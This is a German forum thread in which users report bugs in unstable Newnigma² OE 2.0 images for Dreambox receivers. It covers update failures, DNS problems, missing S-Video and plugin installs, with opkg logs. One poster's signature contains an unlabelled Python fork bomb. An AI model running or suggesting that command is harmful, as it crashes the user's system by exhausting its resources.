Feedback/Bugs in unstable images DM8000/DM7020HD/DM800se/DM800/DM500HD OE2.0

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

  • Ich dachte immer NN2 ist nicht so von DMM abhängig und schaut auch mal über den Tellerrand . . .


    Mensch was hast den du für ein Problem? Die Basis für NN² Images war doch schon immer DMM, denk mal bissel nach, das ist alles noch experimental also in Entwicklung.
    Also mal etwas easy, das wird schon.
    OLED55B7D
  • Originally posted by Èowyn
    Original von sparksofinsanity
    . . .
    Wenn er dir nicht gefällt dann nimm ihn halt nicht und geh woanders trollen.

    Übrigens ist das ein embedded System - wenn du ein richtigen Browser willst dann geh an den PC.
    Auch der QT Browser von emanuel kann ein richtigen Browser nicht ersetzen.
    . . .

    Beschämend, wie hier mit langjährigen NN2-Nutzern umgesprungen wird!

    Ich werde Deinem Rat folgen und auf ein "altes" Gemini umsteigen.

    P.S.: Der Qt-Browser von emanuel ist ein richtiger Browser und er hat mir stundenlang viel Freude beim Surfen am TV gemacht!

    Dann nimm den anderen browser und werd glücklich niemand zwingt dich etwas zu nutzen was dir missfällt ganz einfach.Und wie Fred Bogus Trumper schon richtig gesagt hat deine trollerei kannste wo anders abziehen.
    Da gibt man das neue unstable mal für die hartgesottenen frei das die was zum spielen haben da kommen irgendwelche giftzwerge um die ecke und fangen grundsatzs diskussionen über dmm an bei allem verständnis das geht zu weit.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • hier wird ein Sorglosrundumpaket geliefert, mit dem sich Enigma2, bzw. Newnigma², OE 2.0 bestens beschnuppern lässt, wer bietet sowas noch an?
    Weiterhin darf nicht vergessen werden, dass es sich noch um Alpha-Versionen handelt und Fehler größtenteils in der Basis auftreten, an der DMM schafft.

    Wenn jemand direkt weiß, dass ein Problem bei DMM liegt, dann sollte es auch dort geposted werden => dream-multimedia-tv.de/board/
    Wenn man ein Problem nicht direkt zuordnen kann, dann wird man auch hier weitergeholfen, auch wenn`s evtl. wiederum nur der Hinweis zu DMM ist.


    Zurück zum Thema und zu meinen bisherigen Erfahrungen mit Newnigma² OE 2.0 und einer DM800SE:
    • Update:
      sparksofinsanity hat im Eingangs-Posting darauf hingewiesen und auch ich hatte Probleme bei Updates. Ein Update nach einem Neuflashen funktionierte immer, erst beim zweiten Update ist`s geplatzt. Ein Neuflashen per Browser funktionierte immer problemlos.
    • Netzwerk (DNS):
      Evtl. bestehen die DNS-Probleme immer noch, aber irgendwie funktionierte es dann bei mir, indem ich von DHCP auf statisch umgestellt habe und wieder zurück. Also "irgendwas" in den Netzwerkeinstellungen verändert und danach lief es.
    • Scart:
      Mein Auslöser, dass ich wieder zurück auf Newnigma² 3.3.2 gegangen bin, ist die fehlende S-Video-Einstellung. Ich habe es im DMM-Board geposted aber bisher leider keine Antwort erhalten.
      Wer brauch schon Scart? Ich! :)
      Grund ist, dass meine Testbox per Terratec Grabster am PC hängt und das optimale Bild nur per S-Video erreicht wird.


    Mein Fazit:
    Wer gerne neues testet, ist mit Newnigma² OE 2.0 bestens bedient. Die meisten, evtl. sogar alle, bekannten Plugins aus 3.3.2 sind verfügbar und die von mir getesteten funktionierten alle :)
    Sobald klar ist, das S-Video wieder ODER gar nicht unterstützt wird, werde ich wieder ein Testimage flashen. Alle anderen Boxen sind ja schließlich per HDMI angeschlossen und bevor ich ein ungetestetes Image auf eine produktive Box flashe und damit evtl. von der Familie verbannt werde, nehme ich eine Testbox mit schlechterem Bild in Kauf ;)
    Beste Grüße
    Schorsch

    ------------------------------------------------------------
    OSCam-Config
  • Hallo Team,

    beim heutigen update wurde das e2 mit nem zapping bug von ghost upgedatet.
    Hat er heute nacht behoben.

    Dauert beim zappen etwas länger....

    enigma2: update tarball to 20120606 - hotfixed mainloop bug (fixes slow channelchange speeds, slow response time)


    Baut ihr die feeds heute nochmal neu ?

    Greets LaFo
  • Original von onkel-geordi
    Hallo Team,

    beim heutigen update wurde das e2 mit nem zapping bug von ghost upgedatet.
    Hat er heute nacht behoben.

    Dauert beim zappen etwas länger....

    enigma2: update tarball to 20120606 - hotfixed mainloop bug (fixes slow channelchange speeds, slow response time)


    Baut ihr die feeds heute nochmal neu ?

    Greets LaFo


    Der Bug ist doch auf dem Newnigma-Feed noch gar nicht vorhanden.
    Außerdem wird der Feed gerade schon wieder aktualisiert... ;)

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von dhwz ()

  • hey

    heute update bei der 8k gemacht ohne fehler durchgelaufen .neustart und auch alles wieder io.eben 2.update auch io pastebin.com/6BbRRRWy arbeit ,thx ans team.


    mfg tyson


    geändert nu geht der link
    :freu: Der neid der anderen kotzt mich an :freu:

    Dieser Beitrag wurde bereits 4 mal editiert, zuletzt von tyson ()

  • Hi,
    so heute 2ter Versuch alpha 5, egal was ich veranstallte fast nur "Collected errors", bei einigen Plugins kann ich es verstehen, aber Update egal ob telnet oder über die Box, was mache ich falsch????? ;(
    Nicht das Internet macht wahnsinnig, sondern die Wahnsinnigen machen das Internet!!
    Gruß goetzy200!! :denk:

    DM7020HDss, DM800sec, DM500HD-s, Tastatur Logitech K400r, iMac 21.5, MacBook, Lappi Debian Squeeze, iPhone 5, iPadmini, iPad3, PS3, Sat 13+19.2, Buffalo NAS 1TB


  • Hi,
    hier die Ausgabe!!!


    Quellcode

    1. root@dm7020hd:~# update
    2. Downloading http://feed.newnigma2.to/unstable/4.0/mips32el/Packages.gz.
    3. Inflating http://feed.newnigma2.to/unstable/4.0/mips32el/Packages.gz.
    4. Updated list of available packages in /var/lib/opkg/mips.
    5. Downloading http://feed.newnigma2.to/unstable/4.0/dm7020hd/Packages.gz.
    6. Inflating http://feed.newnigma2.to/unstable/4.0/dm7020hd/Packages.gz.
    7. Updated list of available packages in /var/lib/opkg/nn2.
    8. Downloading http://feed.newnigma2.to/4.0/picons/lcd/Packages.gz.
    9. Inflating http://feed.newnigma2.to/4.0/picons/lcd/Packages.gz.
    10. Updated list of available packages in /var/lib/opkg/piconlcd.
    11. Downloading http://feed.newnigma2.to/4.0/picons/skin/Packages.gz.
    12. Inflating http://feed.newnigma2.to/4.0/picons/skin/Packages.gz.
    13. Updated list of available packages in /var/lib/opkg/piconskin.
    14. Downloading http://feed.newnigma2.to/4.0/picons/skinhd/Packages.gz.
    15. Inflating http://feed.newnigma2.to/4.0/picons/skinhd/Packages.gz.
    16. Updated list of available packages in /var/lib/opkg/piconskinhd.
    17. Downloading http://feed.newnigma2.to/unstable/4.0/emu/Packages.gz.
    18. Inflating http://feed.newnigma2.to/unstable/4.0/emu/Packages.gz.
    19. Updated list of available packages in /var/lib/opkg/softcammipsel.
    20. Upgrading newnigma2-plugins on flash from 1.0svn20120603-r2 to 1.0svn20120607-r0...
    21. Collected errors:
    22. * check_conflicts_for: The following packages conflict with newnigma2-plugins:
    23. * check_conflicts_for: newnigma2-plugins *
    24. root@dm7020hd:~#
    Alles anzeigen



    Und Vali´s EPG kann man garnicht installieren, na erstmal lasse ich es so, TV guggen geht ja grns!! :rolleyes:
    Nicht das Internet macht wahnsinnig, sondern die Wahnsinnigen machen das Internet!!
    Gruß goetzy200!! :denk:

    DM7020HDss, DM800sec, DM500HD-s, Tastatur Logitech K400r, iMac 21.5, MacBook, Lappi Debian Squeeze, iPhone 5, iPadmini, iPad3, PS3, Sat 13+19.2, Buffalo NAS 1TB


    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von goetzy200 ()

  • Jo,
    danke Dir, soweit funzt Alles, ich mecker auch nicht, habe nur noch eine Frage was ist mit Vali´s EPG oder ForecaWeather hat das jemand am Laufen??
    Und Probs hiermit Music Charts (Top 100) Streamer v0.9, aber das mach da im Thread!!! =)
    Nicht das Internet macht wahnsinnig, sondern die Wahnsinnigen machen das Internet!!
    Gruß goetzy200!! :denk:

    DM7020HDss, DM800sec, DM500HD-s, Tastatur Logitech K400r, iMac 21.5, MacBook, Lappi Debian Squeeze, iPhone 5, iPadmini, iPad3, PS3, Sat 13+19.2, Buffalo NAS 1TB


    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von goetzy200 ()

  • hey


    eben wieder update gemacht mit der 8k alles io log pastebin.com/Y596mA4k


    mit sparks tip keine probs .
    ForecaWeather habe ich am laufen ohne probs.

    root@dm8000:~# opkg install --force-reinstall newnigma2-plugins
    Removing package newnigma2-plugins from flash...
    Installing newnigma2-plugins (1.0svn20120607-r0) to flash...
    Downloading feed.newnigma2.to/unstable/4.0…0/newnigma2-plugins_1.0sv
    Configuring newnigma2-plugins.
    root@dm8000:~#




    mfg tyson
    :freu: Der neid der anderen kotzt mich an :freu:

    Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von tyson ()

  • Hi,
    wie hast Du Foreca installiert???
    Nicht das Internet macht wahnsinnig, sondern die Wahnsinnigen machen das Internet!!
    Gruß goetzy200!! :denk:

    DM7020HDss, DM800sec, DM500HD-s, Tastatur Logitech K400r, iMac 21.5, MacBook, Lappi Debian Squeeze, iPhone 5, iPadmini, iPad3, PS3, Sat 13+19.2, Buffalo NAS 1TB


  • Jo,
    Danke damit gehts, sorry habe garnet nach neuer Version gesucht!!! =)
    Nicht das Internet macht wahnsinnig, sondern die Wahnsinnigen machen das Internet!!
    Gruß goetzy200!! :denk:

    DM7020HDss, DM800sec, DM500HD-s, Tastatur Logitech K400r, iMac 21.5, MacBook, Lappi Debian Squeeze, iPhone 5, iPadmini, iPad3, PS3, Sat 13+19.2, Buffalo NAS 1TB


  • Original von goetzy200
    Jo,
    danke Dir, soweit funzt Alles, ich mecker auch nicht, habe nur noch eine Frage was ist mit Vali´s EPG oder ForecaWeather hat das jemand am Laufen??

    Ich hab Vali's EPG drauf, aber wo genau ich das gefunden habe, weiß ich nicht mehr. Wenn ich wieder zu Hause bin, kan ich es ja irgendwo hochladen und den Link hier posten.

    EDIT: es ist von hier

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von schinge ()

  • Jo Danke,
    funzt, langsam nährt sich das Eichhörnchen!!! :]
    Nicht das Internet macht wahnsinnig, sondern die Wahnsinnigen machen das Internet!!
    Gruß goetzy200!! :denk:

    DM7020HDss, DM800sec, DM500HD-s, Tastatur Logitech K400r, iMac 21.5, MacBook, Lappi Debian Squeeze, iPhone 5, iPadmini, iPad3, PS3, Sat 13+19.2, Buffalo NAS 1TB


    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von goetzy200 ()

  • Hallo,

    beim Softwareupdate erhalte ich einen Abbruch wegen collected errors. Passiert auch nach einem frischen neuen Imageflash des alpha5. Abbruch geschieht bei der Installation von newnigma2/plugins.

    Mit welcher telnet- Eingabe bekomme ich eine brauchbare Fehlermeldung? Ich habe da in der Board- und Googlesuche nichts Treffendes gefunden.
    Grüsse aus dem "ganz Nahen Osten" vom Burkhardtsdorfer